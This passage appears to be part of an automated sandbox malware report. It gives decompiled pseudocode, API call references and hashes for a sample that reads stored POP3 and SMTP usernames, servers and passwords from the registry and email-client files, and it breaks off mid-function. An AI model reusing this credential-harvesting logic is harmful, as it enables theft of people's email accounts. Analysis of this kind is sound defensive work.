                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                • String ID:
                                                                                • API String ID: 145871493-0
                                                                                • Opcode ID: cbabdfec5215e458202f737861f40a15f802b817f3ec498c61102a043c0cc1ea
                                                                                • Instruction ID: bd92e302f737a6b7e7c2aa8ed3bd721d1bcdfa8038008227cdd2def65d6b9a1b
                                                                                • Opcode Fuzzy Hash: cbabdfec5215e458202f737861f40a15f802b817f3ec498c61102a043c0cc1ea
                                                                                • Instruction Fuzzy Hash: F1F039B02007028BD7209F39D84879B77E8BF85700F00853EF266E3281EB78A951CB28
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetPrivateProfileIntA.KERNEL32 ref: 0040EB35
                                                                                  • Part of subcall function 0040EA26: memset.MSVCRT ref: 0040EA44
                                                                                  • Part of subcall function 0040EA26: _itoa.MSVCRT ref: 0040EA5B
                                                                                  • Part of subcall function 0040EA26: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0040EA6A
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                • String ID:
                                                                                • API String ID: 4165544737-0
                                                                                • Opcode ID: 41fbf1d09f89329d89d85b9c1c83700b09fa1e2b362e37a4bb4b326ca53279f5
                                                                                • Instruction ID: f55a197cdd86fa31c53d12907dd8f70643f2484b8232c3448506387801693677
                                                                                • Opcode Fuzzy Hash: 41fbf1d09f89329d89d85b9c1c83700b09fa1e2b362e37a4bb4b326ca53279f5
                                                                                • Instruction Fuzzy Hash: F2E0B632000109FBCF125F95EC01AAA7F76FF08314F148869FD5855161D332A570EF55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004047F1(void* __eax) {
                                                                                				struct HINSTANCE__* _t5;
                                                                                				signed int* _t7;
                                                                                
                                                                                				 *(__eax + 0x204) =  *(__eax + 0x204) & 0x00000000;
                                                                                				_t7 = __eax + 0x200;
                                                                                				_t5 =  *_t7;
                                                                                				if(_t5 != 0) {
                                                                                					_t5 = FreeLibrary(_t5); // executed
                                                                                					 *_t7 =  *_t7 & 0x00000000;
                                                                                				}
                                                                                				return _t5;
                                                                                			}






                                                                                APIs
                                                                                • FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: 44cb22c5a6e339dc322f31723d6313ec8e4e2f7ef4db3de4f35608b5b7650eec
                                                                                • Instruction ID: 9a892a7b4d94419058e15305363ecf1fbcdc16662e35282e5c511663eadef616
                                                                                • Opcode Fuzzy Hash: 44cb22c5a6e339dc322f31723d6313ec8e4e2f7ef4db3de4f35608b5b7650eec
                                                                                • Instruction Fuzzy Hash: 90D012721003118FD7705F14EC0CBE133E8AF40312F2584B8EA55E7155C3749584CA58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00405EE4(CHAR* _a4) {
                                                                                				void* _t3;
                                                                                
                                                                                				_t3 = CreateFileA(_a4, 0x40000000, 1, 0, 2, 0, 0); // executed
                                                                                				return _t3;
                                                                                			}





                                                                                APIs
                                                                                • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,00409B54,00000000,00000000,00000000,00412466,00412466,?,0040B99D,00412466), ref: 00405EF6
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 5f03ab8047931506169ca7aa38a5df993ced9b6cd9a6d4ef42b8e6b291ce57f8
                                                                                • Instruction ID: 5973f86ffe51395cbbea2b6db375788de2bc2c82441068c359f9d196895a4387
                                                                                • Opcode Fuzzy Hash: 5f03ab8047931506169ca7aa38a5df993ced9b6cd9a6d4ef42b8e6b291ce57f8
                                                                                • Instruction Fuzzy Hash: F7C092B0290201BEFF208A10AD0AF77295DE780700F10C4207A00E40E0D2A14C109A24
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040E894(void* __esi) {
                                                                                				struct HINSTANCE__* _t6;
                                                                                				int _t7;
                                                                                
                                                                                				_t6 =  *(__esi + 8);
                                                                                				 *(__esi + 0xc) =  *(__esi + 0xc) & 0x00000000;
                                                                                				if(_t6 != 0) {
                                                                                					_t7 = FreeLibrary(_t6); // executed
                                                                                					 *(__esi + 8) =  *(__esi + 8) & 0x00000000;
                                                                                					return _t7;
                                                                                				}
                                                                                				return _t6;
                                                                                			}






                                                                                APIs
                                                                                • FreeLibrary.KERNELBASE(?,0040E8C8,?,?,?,?,?,?,0040421D), ref: 0040E8A0
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: 4be415d56670eca266e1e771d593f986771612930e6043792484bc2d1f3df44a
                                                                                • Instruction ID: 5028da6d49437ecb3f89885db84a6a431b650c8c1a4919c17fb61c23058b4b99
                                                                                • Opcode Fuzzy Hash: 4be415d56670eca266e1e771d593f986771612930e6043792484bc2d1f3df44a
                                                                                • Instruction Fuzzy Hash: 80C04C31110B018FE7219B12C949753B7E4BF00317F44C868955BD58A4D77CE4A4CE18
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040ED91(struct HINSTANCE__* _a4, CHAR* _a8) {
                                                                                
                                                                                				EnumResourceNamesA(_a4, _a8, E0040ED0B, 0); // executed
                                                                                				return 1;
                                                                                			}




                                                                                APIs
                                                                                • EnumResourceNamesA.KERNEL32(?,?,0040ED0B,00000000), ref: 0040EDA0
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnumNamesResource
                                                                                • String ID:
                                                                                • API String ID: 3334572018-0
                                                                                • Opcode ID: 8d1524d9c285d25282b74650c2e98e28a06c4412789f7c986a027f2826179987
                                                                                • Instruction ID: b68387c5c0e4344f5c23b4f6c0320e636f75da40900f583e81955e3ef688938f
                                                                                • Opcode Fuzzy Hash: 8d1524d9c285d25282b74650c2e98e28a06c4412789f7c986a027f2826179987
                                                                                • Instruction Fuzzy Hash: 11C09B31594342D7C7119F109D09F1B7A95FF58701F158C3D7251D40E0C7614034D605
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00406F5B(signed int* __esi) {
                                                                                				int _t2;
                                                                                				void* _t3;
                                                                                
                                                                                				_t3 =  *__esi;
                                                                                				if(_t3 != 0xffffffff) {
                                                                                					_t2 = FindClose(_t3); // executed
                                                                                					 *__esi =  *__esi | 0xffffffff;
                                                                                					return _t2;
                                                                                				}
                                                                                				return 0;
                                                                                			}






                                                                                APIs
                                                                                • FindClose.KERNELBASE(?,00406E75,?,?,00000000,rA,00410C7E,*.oeaccount,rA,?,00000104), ref: 00406F65
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseFind
                                                                                • String ID:
                                                                                • API String ID: 1863332320-0
                                                                                • Opcode ID: 29a0a411e84d7c5badd8bde6db7469c3766740cb6e366e0fff699bb7c3a5e544
                                                                                • Instruction ID: b31b0b49456476ea20311e3f3804ac2d10f8d6de1d59c17087b16cfdac6e9e38
                                                                                • Opcode Fuzzy Hash: 29a0a411e84d7c5badd8bde6db7469c3766740cb6e366e0fff699bb7c3a5e544
                                                                                • Instruction Fuzzy Hash: 67C048351145029AD22C9B38AA5942A77A2AA493303B50B6CB1F3D20E0E77884628A04
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040614B(CHAR* _a4) {
                                                                                				long _t4;
                                                                                
                                                                                				_t4 = GetFileAttributesA(_a4); // executed
                                                                                				return 0 | _t4 != 0xffffffff;
                                                                                			}





                                                                                APIs
                                                                                • GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: e54bea251bae5a778522ddcd773e5ba5f40eb5ac82a352d16be9d7832b5142d7
                                                                                • Instruction ID: f3b66c96cd424dd7ad3beae2567feb80d20b4231abd0f1b127a655f441aacc1c
                                                                                • Opcode Fuzzy Hash: e54bea251bae5a778522ddcd773e5ba5f40eb5ac82a352d16be9d7832b5142d7
                                                                                • Instruction Fuzzy Hash: CAB012752100005BCB0807349D4608E75505F45631720873CB033D00F0D730CC71BB01
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040EB3F(void* _a4, char* _a8, void** _a12) {
                                                                                				long _t4;
                                                                                
                                                                                				_t4 = RegOpenKeyExA(_a4, _a8, 0, 0x20019, _a12); // executed
                                                                                				return _t4;
                                                                                			}

                                                                                APIs
                                                                                • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Open
                                                                                • String ID:
                                                                                • API String ID: 71445658-0
                                                                                • Opcode ID: b46f2f1118fe08c26f7697601471cbdaa0b1b95653fa9af9082cd2e3fcf7fc30
                                                                                • Instruction ID: fbac0a3e3d82dbf35b582ab386aad6bc4faf60f338d600bbfef3ad5534bed626
                                                                                • Opcode Fuzzy Hash: b46f2f1118fe08c26f7697601471cbdaa0b1b95653fa9af9082cd2e3fcf7fc30
                                                                                • Instruction Fuzzy Hash: 60C09B35544301BFDE118F40EE05F09BF62BB88B01F104814B394740B1C3718424FB17
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                C-Code - Quality: 87%
                                                                                			E00402D9A(void* __ecx, void* __edi, void* __esi, void* __fp0, signed int _a4, void* _a8) {
                                                                                				signed int _v8;
                                                                                				char _v20;
                                                                                				char _v24;
                                                                                				char _v152;
                                                                                				char _v280;
                                                                                				char _v408;
                                                                                				intOrPtr _v412;
                                                                                				char _v668;
                                                                                				char _v796;
                                                                                				intOrPtr _v800;
                                                                                				char _v928;
                                                                                				char _v940;
                                                                                				char _v952;
                                                                                				char _v956;
                                                                                				char _v1084;
                                                                                				char _v1212;
                                                                                				char _v1340;
                                                                                				intOrPtr _v1344;
                                                                                				char _v1600;
                                                                                				char _v1728;
                                                                                				intOrPtr _v1732;
                                                                                				char _v1860;
                                                                                				char _v1872;
                                                                                				void* _t59;
                                                                                				signed int _t60;
                                                                                				intOrPtr _t63;
                                                                                				void* _t113;
                                                                                				void* _t118;
                                                                                				void* _t122;
                                                                                				char* _t123;
                                                                                				void* _t141;
                                                                                
                                                                                				_t141 = __fp0;
                                                                                				_t118 = __edi;
                                                                                				_t113 = __ecx;
                                                                                				_t59 = E0040EB3F(_a4, _a8,  &_a8);
                                                                                				if(_t59 == 0) {
                                                                                					_t60 = 0x7d;
                                                                                					_a4 = _t60;
                                                                                					_v8 = _t60;
                                                                                					E004021D8( &_v1872);
                                                                                					E004021D8( &_v940);
                                                                                					_t63 = 2;
                                                                                					_v1732 = _t63;
                                                                                					_v800 = _t63;
                                                                                					_push( &_v928);
                                                                                					_push("DisplayName");
                                                                                					_push(_a8);
                                                                                					_v1344 = 4;
                                                                                					_t122 = 0x7f;
                                                                                					_v412 = 1;
                                                                                					E0040EB80(_t122, _t113);
                                                                                					E0040EB80(_t122, _t113, _a8, "EmailAddress",  &_v796);
                                                                                					E0040EB80(_t122, _t113, _a8, "PopAccount",  &_v408);
                                                                                					E0040EB80(_t122, _t113, _a8, "PopServer",  &_v668);
                                                                                					E0040EB59(_t113, _a8, "PopPort",  &_v24);
                                                                                					E0040EB59(_t113, _a8, "PopLogSecure",  &_v20);
                                                                                					if(E0040EBA3(_t113, _a8, "PopPassword",  &_v280,  &_a4) != 0) {
                                                                                						_a4 = _a4 & 0x00000000;
                                                                                					}
                                                                                					strcpy( &_v1860,  &_v928);
                                                                                					strcpy( &_v1728,  &_v796);
                                                                                					E0040EB80(_t122, _t113, _a8, "SMTPAccount",  &_v1340);
                                                                                					E0040EB80(_t122, _t113, _a8, "SMTPServer",  &_v1600);
                                                                                					E0040EB59(_t113, _a8, "SMTPPort",  &_v956);
                                                                                					E0040EB59(_t113, _a8, "SMTPLogSecure",  &_v952);
                                                                                					if(E0040EBA3(_t113, _a8, "SMTPPassword",  &_v1212,  &_v8) != 0) {
                                                                                						_v8 = _v8 & 0x00000000;
                                                                                					}
                                                                                					_t123 = _t118 + 0xa9c;
                                                                                					strcpy( &_v152, _t123);
                                                                                					strcpy( &_v1084, _t123);
                                                                                					_t116 = _a4;
                                                                                					if(_a4 > 0) {
                                                                                						E00401D18( &_v280, _t116);
                                                                                					}
                                                                                					if(_v408 != 0) {
                                                                                						E00402407( &_v940, _t141, _t118);
                                                                                					}
                                                                                					_t117 = _v8;
                                                                                					if(_v8 > 0) {
                                                                                						E00401D18( &_v1212, _t117);
                                                                                					}
                                                                                					if(_v1340 != 0) {
                                                                                						E00402407( &_v1872, _t141, _t118);
                                                                                					}
                                                                                					return RegCloseKey(_a8);
                                                                                				}
                                                                                				return _t59;
                                                                                			}

                                                                                APIs
                                                                                  • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                  • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                                  • Part of subcall function 0040EB59: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402945,?,?,?,?,00402945,?,?), ref: 0040EB78
                                                                                  • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                                                • strcpy.MSVCRT(?,?), ref: 00402EB1
                                                                                • strcpy.MSVCRT(?,?,?,?), ref: 00402EC4
                                                                                • strcpy.MSVCRT(?,?), ref: 00402F51
                                                                                • strcpy.MSVCRT(?,?,?,?), ref: 00402F5E
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402FB8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strcpy$QueryValue$CloseOpen
                                                                                • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                • API String ID: 4127491968-1534328989
                                                                                • Opcode ID: 230cedb7557afc89ff87b7a07133d539cd397bf30d1a568f7adca2b7a7a96a6c
                                                                                • Instruction ID: 43883d4594eb94b0077ee0611f04b7cce421852a2964d1822423da303833eb9e
                                                                                • Opcode Fuzzy Hash: 230cedb7557afc89ff87b7a07133d539cd397bf30d1a568f7adca2b7a7a96a6c
                                                                                • Instruction Fuzzy Hash: 5D514AB1A0021CBADB11EB56CD41FDE777CAF04354F1084A7BA08B2191D7B8ABA5CF58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004033D7(void* __edi, void* __fp0, intOrPtr _a4) {
                                                                                				char _v276;
                                                                                				char _v404;
                                                                                				intOrPtr _v408;
                                                                                				char _v664;
                                                                                				intOrPtr _v796;
                                                                                				char _v936;
                                                                                				char _v1208;
                                                                                				char _v1336;
                                                                                				intOrPtr _v1340;
                                                                                				char _v1596;
                                                                                				intOrPtr _v1728;
                                                                                				char _v1868;
                                                                                				void* __esi;
                                                                                				intOrPtr _t23;
                                                                                				void* _t35;
                                                                                
                                                                                				_t48 = __fp0;
                                                                                				E004021D8( &_v936);
                                                                                				E004021D8( &_v1868);
                                                                                				_t23 = 4;
                                                                                				_v796 = _t23;
                                                                                				_v1728 = _t23;
                                                                                				_v408 = _t23;
                                                                                				_v1340 = 1;
                                                                                				E00403397(__edi, "SMTPServer",  &_v664);
                                                                                				E00403397(__edi, "ESMTPUsername",  &_v404);
                                                                                				E00403397(__edi, "ESMTPPassword",  &_v276);
                                                                                				E00403397(__edi, "POP3Server",  &_v1596);
                                                                                				E00403397(__edi, "POP3Username",  &_v1336);
                                                                                				_t35 = E00403397(__edi, "POP3Password",  &_v1208);
                                                                                				if(_v276 != 0) {
                                                                                					E004033B8( &_v276);
                                                                                					_t35 = E00402407( &_v936, __fp0, _a4);
                                                                                				}
                                                                                				if(_v1208 != 0) {
                                                                                					E004033B8( &_v1208);
                                                                                					return E00402407( &_v1868, _t48, _a4);
                                                                                				}
                                                                                				return _t35;
                                                                                			}

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: PrivateProfileString_mbscmpstrlen
                                                                                • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                • API String ID: 3963849919-1658304561
                                                                                • Opcode ID: a1e27bd18c60c19633001e89eabf5a28a20170ba59de575fff79d49308c97fe4
                                                                                • Instruction ID: 83b6c818750e3233ea62b9214f8e154f1c79117fabd3a6fe6fd9d90b5f1d4615
                                                                                • Opcode Fuzzy Hash: a1e27bd18c60c19633001e89eabf5a28a20170ba59de575fff79d49308c97fe4
                                                                                • Instruction Fuzzy Hash: DA21E271844218A9DB61EB11CD86BED7B7C9F44709F0000EBAA08B60D2DBBC5BD58F59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 99%
                                                                                			E0040F808(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                				signed int _v8;
                                                                                				void* _v11;
                                                                                				char _v12;
                                                                                				char _v13;
                                                                                				char _v19;
                                                                                				char _v20;
                                                                                				char _v21;
                                                                                				char _v22;
                                                                                				char _v23;
                                                                                				char _v24;
                                                                                				signed int _v28;
                                                                                				short _v30;
                                                                                				short _v32;
                                                                                				char* _v36;
                                                                                				char* _v40;
                                                                                				intOrPtr _v44;
                                                                                				intOrPtr _v48;
                                                                                				intOrPtr _v52;
                                                                                				char* _v56;
                                                                                				char* _v60;
                                                                                				char* _v64;
                                                                                				char _v76;
                                                                                				void _v88;
                                                                                				intOrPtr _v92;
                                                                                				char* _v96;
                                                                                				char* _v100;
                                                                                				intOrPtr _v104;
                                                                                				char* _v108;
                                                                                				char* _v112;
                                                                                				char* _v116;
                                                                                				char* _v120;
                                                                                				char* _v124;
                                                                                				intOrPtr _v128;
                                                                                				char* _v132;
                                                                                				char* _v136;
                                                                                				char* _v140;
                                                                                				char* _v144;
                                                                                				char* _v148;
                                                                                				char* _v152;
                                                                                				intOrPtr _v156;
                                                                                				char* _v160;
                                                                                				char* _v164;
                                                                                				char* _v168;
                                                                                				intOrPtr _v172;
                                                                                				char* _v176;
                                                                                				char* _v180;
                                                                                				char* _v184;
                                                                                				char* _v188;
                                                                                				char* _v192;
                                                                                				char* _v196;
                                                                                				intOrPtr _v200;
                                                                                				char* _v204;
                                                                                				char* _v208;
                                                                                				char* _v212;
                                                                                				char* _v216;
                                                                                				char* _v220;
                                                                                				char* _v224;
                                                                                				char* _v228;
                                                                                				intOrPtr _v232;
                                                                                				char* _v236;
                                                                                				char* _v240;
                                                                                				char* _v244;
                                                                                				char* _v248;
                                                                                				char* _v252;
                                                                                				intOrPtr _v256;
                                                                                				char* _v260;
                                                                                				char* _v264;
                                                                                				char* _v268;
                                                                                				char* _v272;
                                                                                				char* _v276;
                                                                                				char* _v280;
                                                                                				intOrPtr _v284;
                                                                                				char* _v288;
                                                                                				char* _v292;
                                                                                				char* _v296;
                                                                                				intOrPtr _v300;
                                                                                				char* _v304;
                                                                                				char* _v308;
                                                                                				char* _v312;
                                                                                				char* _v316;
                                                                                				char* _v320;
                                                                                				char* _v324;
                                                                                				intOrPtr _v328;
                                                                                				char* _v332;
                                                                                				char* _v336;
                                                                                				char* _v340;
                                                                                				char* _v344;
                                                                                				char* _v348;
                                                                                				char* _v352;
                                                                                				char* _v356;
                                                                                				char* _v360;
                                                                                				char* _v364;
                                                                                				intOrPtr _v368;
                                                                                				intOrPtr _v372;
                                                                                				char* _v376;
                                                                                				char* _v380;
                                                                                				intOrPtr _v384;
                                                                                				char* _v388;
                                                                                				char* _v392;
                                                                                				intOrPtr _v396;
                                                                                				intOrPtr _v400;
                                                                                				char* _v404;
                                                                                				char* _v408;
                                                                                				intOrPtr _v412;
                                                                                				char* _v416;
                                                                                				char* _v420;
                                                                                				char* _v424;
                                                                                				char* _v428;
                                                                                				intOrPtr _v432;
                                                                                				intOrPtr _v436;
                                                                                				char* _v440;
                                                                                				intOrPtr _v444;
                                                                                				char* _v448;
                                                                                				char* _v452;
                                                                                				char* _v456;
                                                                                				char* _v460;
                                                                                				intOrPtr _v464;
                                                                                				char* _v468;
                                                                                				intOrPtr* _t200;
                                                                                				char* _t202;
                                                                                				char _t203;
                                                                                				int _t205;
                                                                                				int _t206;
                                                                                				intOrPtr _t209;
                                                                                				char* _t211;
                                                                                				int _t213;
                                                                                				void _t216;
                                                                                				char _t220;
                                                                                				void _t221;
                                                                                				int _t226;
                                                                                				signed int _t231;
                                                                                				intOrPtr* _t232;
                                                                                				void _t237;
                                                                                				void* _t238;
                                                                                				void* _t240;
                                                                                				void* _t245;
                                                                                				signed int _t246;
                                                                                				signed int _t249;
                                                                                				int _t250;
                                                                                				void* _t251;
                                                                                				int _t252;
                                                                                				void* _t254;
                                                                                				void* _t255;
                                                                                				void* _t256;
                                                                                
                                                                                				_v64 = "amp;";
                                                                                				_v60 = "lt;";
                                                                                				_v56 = "gt;";
                                                                                				_v52 = "quot;";
                                                                                				_v48 = "nbsp;";
                                                                                				_v44 = "apos;";
                                                                                				_v24 = 0x26;
                                                                                				_v23 = 0x3c;
                                                                                				_v22 = 0x3e;
                                                                                				_v21 = 0x22;
                                                                                				_v20 = 0x20;
                                                                                				_v19 = 0x27;
                                                                                				_v468 = "iexcl;";
                                                                                				_v464 = "cent;";
                                                                                				_v460 = "pound;";
                                                                                				_v456 = "curren;";
                                                                                				_v452 = "yen;";
                                                                                				_v448 = "brvbar;";
                                                                                				_v444 = "sect;";
                                                                                				_v440 = "uml;";
                                                                                				_v436 = "copy;";
                                                                                				_v432 = "ordf;";
                                                                                				_v428 = "laquo;";
                                                                                				_v424 = "not;";
                                                                                				_v420 = "shy;";
                                                                                				_v416 = "reg;";
                                                                                				_v412 = "macr;";
                                                                                				_v408 = "deg;";
                                                                                				_v404 = "plusmn;";
                                                                                				_v400 = "sup2;";
                                                                                				_v396 = "sup3;";
                                                                                				_v392 = "acute;";
                                                                                				_v388 = "micro;";
                                                                                				_v384 = "para;";
                                                                                				_v380 = "middot;";
                                                                                				_v376 = "cedil;";
                                                                                				_v372 = "sup1;";
                                                                                				_v368 = "ordm;";
                                                                                				_v364 = "raquo;";
                                                                                				_v360 = "frac14;";
                                                                                				_v356 = "frac12;";
                                                                                				_v352 = "frac34;";
                                                                                				_v348 = "iquest;";
                                                                                				_v344 = "Agrave;";
                                                                                				_v340 = "Aacute;";
                                                                                				_v336 = "Acirc;";
                                                                                				_v332 = "Atilde;";
                                                                                				_v328 = "Auml;";
                                                                                				_v324 = "Aring;";
                                                                                				_v320 = "AElig;";
                                                                                				_v316 = "Ccedil;";
                                                                                				_v312 = "Egrave;";
                                                                                				_v308 = "Eacute;";
                                                                                				_v304 = "Ecirc;";
                                                                                				_v300 = "Euml;";
                                                                                				_v296 = "Igrave;";
                                                                                				_v292 = "Iacute;";
                                                                                				_v288 = "Icirc;";
                                                                                				_v284 = "Iuml;";
                                                                                				_v280 = "ETH;";
                                                                                				_v276 = "Ntilde;";
                                                                                				_v272 = "Ograve;";
                                                                                				_v268 = "Oacute;";
                                                                                				_v264 = "Ocirc;";
                                                                                				_v260 = "Otilde;";
                                                                                				_v256 = "Ouml;";
                                                                                				_v252 = "times;";
                                                                                				_v248 = "Oslash;";
                                                                                				_v244 = "Ugrave;";
                                                                                				_v240 = "Uacute;";
                                                                                				_v236 = "Ucirc;";
                                                                                				_v232 = "Uuml;";
                                                                                				_v228 = "Yacute;";
                                                                                				_v224 = "THORN;";
                                                                                				_v220 = "szlig;";
                                                                                				_v216 = "agrave;";
                                                                                				_v212 = "aacute;";
                                                                                				_v208 = "acirc;";
                                                                                				_v204 = "atilde;";
                                                                                				_t200 = _a8;
                                                                                				_v28 = _v28 | 0xffffffff;
                                                                                				_t231 = 0;
                                                                                				_t254 = 0;
                                                                                				_v200 = "auml;";
                                                                                				_v196 = "aring;";
                                                                                				_v192 = "aelig;";
                                                                                				_v188 = "ccedil;";
                                                                                				_v184 = "egrave;";
                                                                                				_v180 = "eacute;";
                                                                                				_v176 = "ecirc;";
                                                                                				_v172 = "euml;";
                                                                                				_v168 = "igrave;";
                                                                                				_v164 = "iacute;";
                                                                                				_v160 = "icirc;";
                                                                                				_v156 = "iuml;";
                                                                                				_v152 = "eth;";
                                                                                				_v148 = "ntilde;";
                                                                                				_v144 = "ograve;";
                                                                                				_v140 = "oacute;";
                                                                                				_v136 = "ocirc;";
                                                                                				_v132 = "otilde;";
                                                                                				_v128 = "ouml;";
                                                                                				_v124 = "divide;";
                                                                                				_v120 = "oslash;";
                                                                                				_v116 = "ugrave;";
                                                                                				_v112 = "uacute;";
                                                                                				_v108 = "ucirc;";
                                                                                				_v104 = "uuml;";
                                                                                				_v100 = "yacute;";
                                                                                				_v96 = "thorn;";
                                                                                				_v92 = "yuml;";
                                                                                				if( *_t200 == 0) {
                                                                                					L45:
                                                                                					_t202 = _a4 + _t231;
                                                                                					 *_t202 = 0;
                                                                                					if(_a20 == 0 || _t231 <= 0 ||  *((char*)(_t202 - 1)) != 0x20) {
                                                                                						return _t202;
                                                                                					} else {
                                                                                						 *((char*)(_t202 - 1)) = 0;
                                                                                						return _t202;
                                                                                					}
                                                                                				}
                                                                                				while(_a12 == 0xffffffff || _a12 > _t254) {
                                                                                					_t232 = _t254 + _t200;
                                                                                					_t203 =  *_t232;
                                                                                					_v13 = _t203;
                                                                                					if(_t203 != 0x26) {
                                                                                						L33:
                                                                                						if(_a16 == 0 || _t203 > 0x20) {
                                                                                							 *((char*)(_t231 + _a4)) = _t203;
                                                                                							_t231 = _t231 + 1;
                                                                                						} else {
                                                                                							if(_t231 != _v28) {
                                                                                								 *((char*)(_t231 + _a4)) = 0x20;
                                                                                								_t231 = _t231 + 1;
                                                                                								if(_a20 != 0 && _t231 == 1) {
                                                                                									_t231 = 0;
                                                                                								}
                                                                                							}
                                                                                							_v28 = _t231;
                                                                                						}
                                                                                						_t254 = _t254 + 1;
                                                                                						L43:
                                                                                						_t200 = _a8;
                                                                                						if( *((char*)(_t254 + _t200)) != 0) {
                                                                                							continue;
